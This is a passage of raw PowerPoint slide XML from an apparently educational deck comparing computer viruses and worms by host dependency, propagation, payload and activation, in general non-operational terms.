                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2124075"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Host Dependency</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Host Dependency</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses attach themselves to a host file or program. They need a host program to carry out their malicious actions. When the host program is executed, the virus is activated.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are standalone programs that do not require a host file to propagate. They operate independently and can execute their code without relying on another program.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1593850"/>
            <a:ext cx="914400" cy="9144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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="30000" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2048510"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses rely on human action to propagate. They typically spread when an infected file or program is shared or transferred by users. For example, viruses often spread via infected email attachments, shared files, or infected downloads.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are self-replicating and can spread autonomously across networks or devices. They exploit vulnerabilities or security weaknesses to infect other computers or devices.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1518285"/>
            <a:ext cx="914400" cy="9144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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="A728BE"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2048510"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses may or may not have a payload. If they have a payload, it is the malicious action they perform, such as deleting files or displaying a message.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms may have a payload, which could be a malicious action like deleting files or installing a backdoor for remote control. However, their primary purpose is to spread rapidly.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="冠状病毒"/>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364490" y="1518285"/>
            <a:ext cx="914400" cy="914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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="A728BE"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2188845"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Activation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Activation</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses are activated when the infected host program is executed. They can remain dormant until the user runs or opens the infected file.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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7F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are designed to start spreading as soon as they infiltrate a system. They don't require user interaction to execute their code.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="0202060305040502030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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1658620"/>
            <a:ext cx="914400" cy="9144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rcRect t="4519" b="16150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12179935" cy="6889750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12192000" cy="690054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charset="0"/>
              <a:ea typeface="阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-19050" y="2219960"/>
            <a:ext cx="12198985" cy="10147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a:ln w="19050">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="思源黑体 CN Normal" panose="020B0400000000000000" charset="-122"/>
              </a:rPr>
              <a:t>THE END</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="19050">
                <a:noFill/>
              </a:ln>
